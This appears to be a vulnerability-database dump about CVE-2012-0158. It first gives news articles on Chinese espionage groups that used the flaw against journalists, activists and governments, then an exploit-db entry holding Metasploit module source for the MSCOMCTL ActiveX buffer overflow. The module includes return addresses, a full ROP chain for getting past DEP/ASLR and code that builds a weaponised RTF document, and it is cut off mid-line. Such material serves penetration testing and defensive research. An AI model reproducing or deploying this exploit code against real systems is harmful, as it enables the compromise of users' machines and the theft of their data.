against foreign governments and ministries, has now pointed its focus inward at China\u2019s autonomous territory Hong Kong.\n\nAn August attack against several media companies in Hong Kong was carried out shortly after a high-profile controversy over [an appointment at the prestigious Hong Kong University](<http://www.scmp.com/news/hong-kong/education-community/article/1844800/why-scuffle-hong-kong-universitys-appointment?page=all>). This is not the first time China has targeted media outlets, especially in Hong Kong, in particular seeking out journalists\u2019 sources and attempting to stay ahead of a news cycle. In January 2013, hackers, allegedly connected to the Chinese government, were blamed by Mandiant for a [breach at the _New York Times_](<https://threatpost.com/inside-targeted-attack-new-york-times-013113/77477/>)_._ The group targeted the email accounts of investigative journalists looking into alleged corruption involving then-Chinese premier Wen Jiabao.\n\nThe group targeting Hong Kong media outlets is called [admin@338](<https://threatpost.com/mh-370-related-phishing-attacks-spotted-against-government-targets/105024/>) and is known to researchers for using publicly available [remote access Trojans such as Poison Ivy](<https://threatpost.com/poison-ivy-rat-spotted-in-three-new-attacks/102022/>) to attack government and financial firms specializing in global economic policy.\n\nIn this case, researchers at FireEye said that this is one of the first instances this group has used [phishing lures written in Chinese](<https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html>) against targets. Three attachments accompanied each phishing email, all of which were exploits for a patched Microsoft Office vulnerability, [CVE-2012, 0158](<https://securelist.com/analysis/publications/37158/the-curious-case-of-a-cve-2012-0158-exploit/>), a buffer overflow in the Windows Common Control Library patched in early 2012.\n\nOnce executed, a backdoor called Lowball is dropped onto the compromised machine which then connects to a legitimate Dropbox account belonging to the attackers. This first stage of the attack runs a number of commands on the infected computer and sends the output to the Dropbox account, said FireEye principal threat analyst Nart Villeneuve. The attackers retrieve the information, analyze it, and if the target is worthy, a second stage backdoor is delivered called Bubblewrap, a much more traditional backdoor that is used for remote control and stealing data.\n\nVilleneuve said that APT gangs could soon be trending toward involving cloud-based services such as Dropbox as part of their attacks.\n\n\u201cThese attackers are using Dropbox because it provides them with a way to disguise their activities,\u201d Villeneuve said. \u201cAnyone looking at the traffic would see only encrypted connections going to Dropbox rather than traffic associated with known malware.\u201d\n\nThe phishing emails began showing up in the inboxes of Hong Kong-based newspapers, television and radio stations, targeting journalists with tidbits about current events including one purporting to be from alumni of Hong Kong University sharing their concerns over a vote to appoint a vice-chancellor at the school being influenced by Beijing. The first stage of the attack, Villeneuve said, is essentially reconnaissance. Once the exploit is executed, it connects to Dropbox using the service\u2019s API and creates a file in Dropbox using the name of the compromised host. The file contains IPconfig data, user and domain information, and lists of program files and recently created documents.\n\n\u201cThe attackers look at the information and determines if the target is of interest. If they are, they then put an executable in the Dropbox account so that the next time compromised host checks in, it pulls down the executable and a well-known backdoor is dropped giving them real-time access to the host.\u201d\n\nFireEye said it shared its findings with Dropbox, which investigated further and found a separate and larger attack that is likely connected to the same group.\n\n\u201c[Dropbox] found another set of activity using malware that was almost the same and in that case, the attack appeared to be much larger, about 50 targets,\u201d Villeneuve said, adding that the second attack is ongoing. \u201cWe are pretty sure this second cluster of activity is related. There\u2019s nothing we can link them to other than it looks the same, with multiple Dropbox accounts and a few more targets.\n", "modified": "2015-12-01T16:37:53", "published": "2015-12-01T11:37:53", "id": "THREATPOST:1842F12350B277A2FE1B6F4AF2F1BFDB", "href": "https://threatpost.com/china-apt-gang-targets-hong-kong-media-via-dropbox/115513/", "type": "threatpost", "title": "China APT Gang Targets Hong Kong Media via Dropbox", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:45", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158"], "description": "Researchers have discovered a mature attack platform that\u2019s enjoyed great success eluding detection and made good use of an exploit present in a number of espionage campaigns.\n\nThe attacks have concentrated largely on the automotive industry, hitting large companies primarily in Asia and only after being tested against activist targets in the region. Nicknamed [Grand Theft Auto Panda](<http://www.cylance.com/techblog/Grand-Theft-Auto-Panda.shtml>) by researcher Jon Gross of Cylance, the attacks rely on the well-worn exploits used against [CVE-2012-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158>). Malicious Microsoft Office documents are sent to the victim, who must interact with the .xls, .doc, or other file in a phishing email or website in order to exploit the vulnerability and inject malware or cause a service disruption.\n\nThese attacks are not carried out on the same scale as those by the [Comment Crew](<http://threatpost.com/comment-crew-expos-new-level-china-attack-attribution-021913>) or other high profile APT gangs. Specific targets are chosen in these campaigns, and those targets are phished with convincing messaging, such as a negative customer service review as in one attack spotted by Cylance.\n\nThe platform has been around for a few years and can be used to steal not only system and network information, but documents and credentials, in addition to opening a backdoor connection to the attacker in order to move stolen data.\n\n\u201cIt\u2019s more of an extensible platform to where they can add in any functionality they want as a plug-in. It\u2019s more of an infection framework than any specific Trojan,\u201d Gross said. \u201cThey can modify the components over time and not have to really worry about it if the main component is never detected. This is more like extensible platform where they add in functionality, screen capture, key logging, they just send it up as a plug in.\u201d\n\nCVE-2012-0158, meanwhile, has been a favorite among nation-state attackers seeking to infiltrate corporations or activist groups for espionage or surveillance. It was detected in the [Icefog](<http://threatpost.com/icefog-espionage-campaign-is-hit-and-run-targeted-operation/102417>) and [NetTraveler](<http://threatpost.com/net-traveler-espionage-campaign-uncovered-links-to-gh0st-rat-titan-rain-found/100865>) campaigns discovered by Kaspersky Lab. Both were linked to operatives in China and follow similar patterns as GTA Panda in that that they\u2019re attacking both activists and manufacturing companies.\n\n\u201cWe see a lot people who are attacking industries, also attacking human rights groups. We\u2019ve always thought it just comes down as a directive from whomever to test this against them,\u201d Gross said. \u201cWe see a lot of new malware tested against human rights activists before it ever makes its way to the corporate environments. The original stuff I found was not targeted against human rights, but as I dug into it, I saw more and more stuff that was also additionally targeting human rights; and that was older stuff before they moved on to corporations.\u201d\n\n[NetTraveler](<http://threatpost.com/nettraveler-variant-adds-java-exploits-watering-hole-attacks-to-bag-of-tricks/102156>), for example, made use of the CVE-2012-0158 Office exploits to target the Uyghur and Tibetan activists, before moving on to oil and energy companies as well as diplomats and government agencies around the world.\n\n\u201cIt\u2019s kinda like a Darwinian evolution of malware. If it passes the first test, it\u2019s survival of the fittest. The things that don\u2019t get detected get reused,\u201d Gross said. \u201cHuman rights are almost like a playground. They\u2019re always a target, and we see a lot of malware that\u2019s used against them before anyone else.\u201d\n\nAs for the platform, its staying power is due to its stealth.\n\n\u201cThe big thing is moving functionality out of the actual files that get loaded into [victims\u2019 machines] because then it doesn\u2019t look suspicious until that file subsequently loads something else that performs the malicious activity,\u201d Gross said. \u201cThe malicious components are sitting there encrypted on disk, where your typical security product is not going to find that unless they already know about it.\u201d\n\nThere are also layers of encryption protecting the attack that shield it from detection, Gross said. As for the exploits, lax patching is likely the biggest culprit; in this case, CVE-2012-0158 was patched more than 18 months ago by Microsoft. Combine that with effective social engineering in the phishing messaging\u2014in particular from spoofed, trusted email addresses\u2014and that\u2019s a potent cocktail for trouble.\n\n\u201cIf you get emails that look like they\u2019re coming from trusted parties and people you usually communicate with, then our guard drops and we\u2019re much more likely to say OK, I\u2019ll open that,\u201d Gross said. \u201cI think they rely on that really heavily, especially with the activist community because they know all these people and they know who they communicate with on a regular basis and they try to make it look like it comes from them. Their guard\u2019s totally down and they\u2019re not worried about it.\u201d\n", "modified": "2013-11-27T20:28:16", "published": "2013-11-25T10:26:50", "id": "THREATPOST:440B0C9A3453F28AD6AABD6CD97AA074", "href": "https://threatpost.com/extensible-attack-platform-has-familiar-feel/103021/", "type": "threatpost", "title": "Grand Theft Auto Panda APT Espionage Attack Platform", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:14", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158"], "description": "Chinese president Xi Jinping is supposed to have dinner this evening with U.S. president Barack Obama. Wonder if the name Ge Xing will come up?\n\nGe Xing is the subject of a joint [report](<http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf?t=1443030820943&submissionGuid=81f1c199-859f-41e9-955b-2eec13777720>) published this morning by ThreatConnect and Defense Group Inc., computer and national security service providers respectively. Ge is alleged to be a member of the People\u2019s Liberation Army unit 78020, a state-sponsored hacking team whose mission is to collect intelligence from political and military sources to advance China\u2019s interests in the South China Sea, a key strategic and economic region in Asia with plenty of ties to the U.S.\n\nThe report connects PLA 78020 to the Naikon advanced persistent threat group, a state-sponsored outfit that has followed the APT playbook to the letter to infiltrate and steal sensitive data and intellectual property from military, diplomatic and enterprise targets in a number of Asian countries, as well as the United Nations Development Programme and the Association of Southeast Asian Nations (ASEAN).\n\nControl over the South China Sea is a focal point for China; through this region flows trillions of dollars of commerce and China has not been shy about claiming its share of the territory. The report states that China uses its offensive hacking capabilities to gather intelligence on adversaries\u2019 military and diplomatic intentions in the regions, and has leveraged the information to strengthen its position.\n\n\u201cThe South China Sea is seen as a key geopolitical area for China,\u201d said Dan Alderman, deputy director of DGI. \u201cWith Naikon, we see their activity as a big element of a larger emphasis on the region and the Technical Reconnaissance Bureau fitting into a multisector effort to influence that region.\u201d\n\nThe report is just the latest chess piece hovering over Jinping\u2019s U.S. visit this week, which began in earnest yesterday with a visit to Seattle and meetings with giant technology firms such as Microsoft, Apple and Google, among others. Those companies want to tap into the growing Chinese technology market and the government there is using its leverage to get them to support stringent Internet controls imposed by the Chinese government.\n\nA letter sent to American technology companies this summer, a _[New York Times](<http://www.nytimes.com/2015/09/17/technology/china-tries-to-extract-pledge-of-compliance-from-us-tech-firms.html>)_ report last week, said that China would ask American firms to store Chinese user data in China. China also reportedly asked U.S.-built software and devices sold in China to be \u201csecure and controllable,\u201d which likely means the Chinese would want backdoor access to these products, or access to private encryption keys.\n\nJinping, meanwhile, tried to distance himself from the fray when he said in a _Wall Street Journal _interview: \u201cCyber theft of commercial secrets and hacking attacks against government networks are both illegal; such acts are criminal offences and should be punished according to law and relevant international conventions.\u201d\n\n_Journal_ reporter [Josh Chin connected with Ge Xing over the phone](<http://www.wsj.com/articles/cyber-sleuths-track-hacker-to-chinas-military-1443042030>) and Ge confirmed a number of the dots connected in the report before hanging up on the reporter and threatening to report him to the police. While that never happened, the infrastructure connected to Ge and this slice of the Naikon APT group, was quickly shut down and taken offline.\n\nIn May, researchers at Kaspersky Lab published a report on [Naikon](<https://securelist.com/analysis/publications/69953/the-naikon-apt/>) and documented five years of activity attributed to the APT group. It describes a high volume of [geo-politically motivated attacks](<https://securelist.com/blog/research/70029/the-naikon-apt-and-the-msnmm-campaigns/>) with a high rate of success infiltrating influential organizations in the region. The group uses advanced hacking tools, most of which were developed externally and include a full-featured backdoor and exploit builder.\n\nLike most APT groups, they craft tailored spear phishing messages to infiltrate organizations, in this case a Word or Office document carrying an exploit for CVE-2012-0158, a favorite target for APT groups. The vulnerability is a buffer overflow in the ActiveX controls of a Windows library, MSCOMCTL.OCX. The exploit installs a remote administration tool, or RAT, on the compromised machine that opens a backdoor through which stolen data is moved out and additional malware and instructions can be moved in.\n\nChin\u2019s article describes a similar attack initiated by Ge, who is portrayed not only as a soldier, but as an academic. The researchers determined through a variety of avenues that Ge is an active member of the military, having published research as a member of the military, in addition to numerous postings to social media as an officer and via his access to secure locations believed to be headquarters to the PLA unit\u2019s technical reconnaissance bureau.\n\n\u201cDoing this kind of biopsy, if you will, of this threat through direct analysis of the technical and non-technical evidence allows us to paint a picture of the rest of this group\u2019s activity,\u201d said Rich Barger, CIO and cofounder of ThreatConnect. \u201cWe\u2019ve had hundreds of hashes, hundreds of domains, and thousands of IPs [related to PLA unit 78020]. Only looking at this from a technical lens only gives you so much. When you bring in a regional, cultural and even language aspect to it, you can derive more context that gets folded over and over into the technical findings and continues to refine additional meaning that we can apply to the broader group itself.\u201d\n\nThe report also highlights a number of operational security mistakes Ge made to inadvertently give himself away, such as using the same handle within the group\u2019s infrastructure, even embedding certain names in families of malware attributed to them. All of this combined with similar mistakes made across the command and control infrastructure and evidence pulled from posts on social media proved to be enough to tie Ge to the Naikon group and elite PLA unit that is making gains in the region.\n\n\u201cIf you look at where China is and how assertive they are in region, it might be a reflection of some of the gains and wins this group has made,\u201d Barger said. \u201cYou don\u2019t influence what they\u2019re influencing in the region if you don\u2019t have the intel support capabilities fueling that operational machine.\u201d\n", "modified": "2015-09-25T13:01:29", "published": "2015-09-24T13:37:36", "id": "THREATPOST:9CD19A6A1B939482B336348DA5D2F47C", "href": "https://threatpost.com/naikon-apt-group-tied-to-chinas-pla-unit-78020/114798/", "type": "threatpost", "title": "China PLA Unit 78020 Cyberespionage Naikon APT", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:07", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158"], "description": "Hold off on the notion that [watering hole attacks](<http://threatpost.com/why-watering-hole-attacks-work-032013/77647>) may supplant [phishing as the initial means of compromise](<http://threatpost.com/spear-phishing-remains-preferred-point-entry-targeted-persistent-attacks-113012/77267>) in advanced attacks. A number of recent targeted campaigns have used the crash of Malaysia Airlines 370 as a lure to infect government officials in the U.S. and Asia-Pacific.\n\nFireEye today published research on a number of [spear phishing attacks](<http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html>) that contained either infected attachments or links to malicious websites. One Chinese group, [admin@338](<http://threatpost.com/poison-ivy-rat-spotted-in-three-new-attacks/102022>), has been active in the past targeting international financial firms that have expertise in analyzing global economic policies. Two days after flight 370 was reported missing, a spear phishing email was sent to government officials in Asia-Pacific, FireEye said, with an attachment referring to the missing airliner.\n\nUsers who clicked on the attachment saw a blank document, while in the background a variant of the Poison Ivy Trojan was installing and eventually established a backdoor to www[.]verizon[.]proxydns[.]com. This group has used both Poison Ivy and this domain in previous attacks, FireEye said.\n\nPoison Ivy has some miles on it, but security researchers say hacker groups, in particular some with ties to China, continue to make use of it. The malware is a remote access Trojan that allows attackers to not only set up backdoor communication with infected machines, but push additional malicious code, steal documents and system information, and pivot internally.\n\nFireEye said it monitored a second attack from the admin@338 group which targeted a \u201cU.S.-based think tank\u201d on March 14. The malicious attachment pretended to be a Flash video related to the missing plane and attached a Flash icon to the executable, researchers said.\n\nThis version of Poison Ivy connected to its command and control at dpmc[.]dynssl[.]com:443 and www[.]dpmc[.]dynssl[.]com:80, FireEye said, adding that the phony Verizon domain used in the first attack also resolved to an IP used by this attack as well.\n\nAdmin@338 is not the only hacker group using the Malaysia tragedy to its advantage. On March 9, a malicious executable disguised as a PDF connected to a command and control server at net[.]googlereader[.]pw:443. The victim is shown a phony PDF purporting to be a CNN story about the disappearance of the flight.\n\nThree more samples were detected that used a Word document, or an executable, disguised as a .DOC extension, dropping an exploit for CVE-2012-0158 used in the [IceFog](<http://threatpost.com/icefog-espionage-campaign-is-hit-and-run-targeted-operation/102417>), [NetTraveler](<http://threatpost.com/net-traveler-espionage-campaign-uncovered-links-to-gh0st-rat-titan-rain-found/100865>) and [Red October APT](<http://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/77397>) campaigns reported by Kaspersky Lab. All of these exploits behaved similarly, targeting high-value victims with backdoor connections.\n", "modified": "2014-03-26T12:21:21", "published": "2014-03-25T16:04:54", "id": "THREATPOST:ACF4961C0305F2447E96F09C6C460079", "href": "https://threatpost.com/mh-370-related-phishing-attacks-spotted-against-government-targets/105024/", "type": "threatpost", "title": "Malaysia Airlines Flight 370 spear phishing emails spotted", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T10:26:20", "description": "MS12-027 MSCOMCTL ActiveX Buffer Overflow. CVE-2012-0158. Remote exploit for windows platform", "published": "2012-04-25T00:00:00", "type": "exploitdb", "title": "WIndows - MSCOMCTL ActiveX Buffer Overflow MS12-027", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0158"], "modified": "2012-04-25T00:00:00", "id": "EDB-ID:18780", "href": "https://www.exploit-db.com/exploits/18780/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'MS12-027 MSCOMCTL ActiveX Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious\r\n\t\t\t\tRTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited\r\n\t\t\t\tin the wild on April 2012.\r\n\r\n\t\t\t\tThis module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office\r\n\t\t\t\t2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses\r\n\t\t\t\t\"msgr3en.dll\", which will load after office got load, so the malicious file must\r\n\t\t\t\tbe loaded through \"File / Open\" to achieve exploitation.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # Vulnerability discovery\r\n\t\t\t\t\t'juan vazquez', # Metasploit module\r\n\t\t\t\t\t'sinn3r' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-0158' ],\r\n\t\t\t\t\t[ 'OSVDB', '81125' ],\r\n\t\t\t\t\t[ 'BID', '52911' ],\r\n\t\t\t\t\t[ 'MSB', 'MS12-027' ],\r\n\t\t\t\t\t[ 'URL', 'http://contagiodump.blogspot.com.es/2012/04/cve2012-0158-south-china-sea-insider.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://abysssec.com/files/The_Arashi.pdf' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", # Stack adjustment # add esp, -3500,\r\n\t\t\t\t\t'Space' => 900,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true # no need\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# winword.exe v12.0.4518.1014 (No Service Pack)\r\n\t\t\t\t\t# winword.exe v12.0.6211.1000 (SP1)\r\n\t\t\t\t\t# winword.exe v12.0.6425.1000 (SP2)\r\n\t\t\t\t\t# winword.exe v12.0.6612.1000 (SP3)\r\n\t\t\t\t\t[ 'Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 270,\r\n\t\t\t\t\t\t\t'Ret' => 0x27583c30, # jmp esp # MSCOMCTL.ocx 6.1.95.45\r\n\t\t\t\t\t\t\t'Rop' => false\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# winword.exe v14.0.6024.1000 (SP1)\r\n\t\t\t\t\t[ 'Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x3F2CB9E1, # ret # msgr3en.dll\r\n\t\t\t\t\t\t\t'Rop' => true,\r\n\t\t\t\t\t\t\t'RopOffset' => 120\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Apr 10 2012',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef stream(bytes)\r\n\t\tRex::Text.to_hex(bytes).gsub(\"\\\\x\", \"\")\r\n\tend\r\n\r\n\tdef junk(n=1)\r\n\t\ttmp = []\r\n\t\tvalue = rand_text(4).unpack(\"L\")[0].to_i\r\n\t\tn.times { tmp << value }\r\n\t\treturn tmp\r\n\tend\r\n\r\n\t# Ikazuchi ROP chain (msgr3en.dll)\r\n\t# Credits to Abysssec\r\n\t# http://abysssec.com/files/The_Arashi.pdf\r\n\tdef create_rop_chain\r\n\t\trop_gadgets = [\r\n\t\t\t0x3F2CB9E0, # POP ECX # RETN\r\n\t\t\t0x3F10115C, # HeapCreate() IAT = 3F10115C\r\n\t\t\t# EAX == HeapCreate() Address\r\n\t\t\t0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN\r\n\t\t\t# Call HeapCreate() and Create a Executable Heap. After this call, EAX contain our Heap Address.\r\n\t\t\t0x3F39AFCF, # CALL EAX # RETN\r\n\t\t\t0x00040000,\r\n\t\t\t0x00010000,\r\n\t\t\t0x00000000,\r\n\t\t\t0x3F2CB9E0, # POP ECX # RETN\r\n\t\t\t0x00008000, # pop 0x00008000 into ECX\r\n\t\t\t# add ECX to EAX and instead of calling HeapAlloc, now EAX point to the RWX Heap\r\n\t\t\t0x3F39CB46, # ADD EAX,ECX # POP ESI # RETN\r\n\t\t\tjunk,\r\n\t\t\t0x3F2CB9E0, # POP ECX # RETN\r\n\t\t\t0x3F3B3DC0, # pop 0x3F3B3DC0 into ECX, it is a writable address.\r\n\t\t\t# storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for further use ;)\r\n\t\t\t0x3F2233CC, # MOV DWORD PTR DS:[ECX],EAX # RETN\r\n\t\t\t0x3F2D59DF, #POP EAX # ADD DWORD PTR DS:[EAX],ESP # RETN\r\n\t\t\t0x3F3B3DC4, # pop 0x3F3B3DC4 into EAX , it is writable address with zero!\r\n\t\t\t\t\t\t\t\t\t# then we add ESP to the Zero which result in storing ESP into that address,\r\n\t\t\t\t\t\t\t\t\t# we need ESP address for copying shellcode ( which stores in Stack ),\r\n\t\t\t\t\t\t\t\t\t# and we have to get it dynamically at run-time, now with my tricky instruction, we have it!\r\n\t\t\t0x3F2F18CC, # POP EAX # RETN\r\n\t\t\t0x3F3B3DC4, # pop 0x3F3B3DC4 ( ESP address ) into EAX\r\n\t\t\t# makes ECX point to nearly offset of Stack.\r\n\t\t\t0x3F2B745E, # MOV ECX,DWORD PTR DS:[EAX] #RETN\r\n\t\t\t0x3F39795E, # POP EDX # RETN\r\n\t\t\t0x00000024, # pop 0x00000024 into EDX\r\n\t\t\t# add 0x24 to ECX ( Stack address )\r\n\t\t\t0x3F39CB44, # ADD ECX,EDX # ADD EAX,ECX # POP ESI # RETN\r\n\t\t\tjunk,\r\n\t\t\t# EAX = ECX\r\n\t\t\t0x3F398267, # MOV EAX,ECX # RETN\r\n\t\t\t# mov EAX ( Stack Address + 24 = Current ESP value ) into the current Stack Location,\r\n\t\t\t# and the popping it into ESI ! now ESI point where shellcode stores in stack\r\n\t\t\t0x3F3A16DE, # MOV DWORD PTR DS:[ECX],EAX # XOR EAX,EAX # POP ESI # RETN\r\n\t\t\t# EAX = ECX\r\n\t\t\t0x3F398267, # MOV EAX,ECX # RETN\r\n\t\t\t0x3F2CB9E0, # POP ECX # RETN\r\n\t\t\t0x3F3B3DC0, # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX\r\n\t\t\t# makes EAX point to our RWX Heap\r\n\t\t\t0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN\r\n\t\t\t# makes EDI = Our RWX Heap Address\r\n\t\t\t0x3F2B0A7C, # XCHG EAX,EDI # RETN 4\r\n\t\t\t0x3F2CB9E0, # POP ECX # RETN\r\n\t\t\tjunk,\r\n\t\t\t0x3F3B3DC0, # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX\r\n\t\t\t# makes EAX point to our RWX Heap\r\n\t\t\t0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN\r\n\t\t\t# just skip some junks\r\n\t\t\t0x3F38BEFB, # ADD AL,58 # RETN\r\n\t\t\t0x3F2CB9E0, # POP ECX # RETN\r\n\t\t\t0x00000300, # pop 0x00000300 into ECX ( 0x300 * 4 = Copy lent )\r\n\t\t\t# Copy shellcode from stack into RWX Heap\r\n\t\t\t0x3F3441B4, # REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] # POP EDI # POP ESI # RETN\r\n\t\t\tjunk(2), # pop into edi # pop into esi\r\n\t\t\t0x3F39AFCF # CALL EAX # RETN\r\n\t\t].flatten.pack(\"V*\")\r\n\r\n\t\t# To avoid shellcode being corrupted in the stack before ret\r\n\t\trop_gadgets << \"\\x90\" * target['RopOffset'] # make_nops doesn't have sense here\r\n\t\treturn rop_gadgets\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tret_address = stream([target.ret].pack(\"V\"))\r\n\r\n\t\tif target['Rop']\r\n\t\t\tshellcode = stream(create_rop_chain)\r\n\t\telse\r\n\t\t\t# To avoid shellcode being corrupted in the stack before ret\r\n\t\t\tshellcode = stream(make_nops(target['Offset']))\r\n\t\t\tshellcode << stream(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $+6\").encode_string)\r\n\t\t\tshellcode << stream(make_nops(4))\r\n\t\tend\r\n\t\tshellcode << stream(payload.encoded)\r\n\t\twhile shellcode.length < 2378\r\n\t\t\tshellcode += \"0\"\r\n\t\tend\r\n\r\n\t\tcontent = \"{\\\\rtf1\"\r\n\t\tcontent << \"{\\\\fonttbl{\\\\f0\\\\fnil\\\\fcharset0 Verdana;}}\"\r\n\t\tcontent << \"\\\\viewkind4\\\\uc1\\\\pard\\\\sb100\\\\sa100\\\\lang9\\\\f0\\\\fs22\\\\par\"\r\n\t\tcontent << \"\\\\pard\\\\sa200\\\\sl276\\\\slmult1\\\\lang9\\\\fs22\\\\par\"\r\n\t\tcontent << \"{\\\\object\\\\objocx\"\r\n\t\tcontent << \"{\\\\*\\\\objdata\"\r\n\t\tcontent << \"\\n\"\r\n\t\tcontent << \"01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E320000\"\r\n\t\tcontent << \"00000000000000000E0000\"\r\n\t\tcontent << \"\\n\"\r\n\t\tcontent << \"D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF09000600000000000000\"\r\n\t\tcontent << \"00000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFF\"\r\n\t\tcontent << \"FEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << 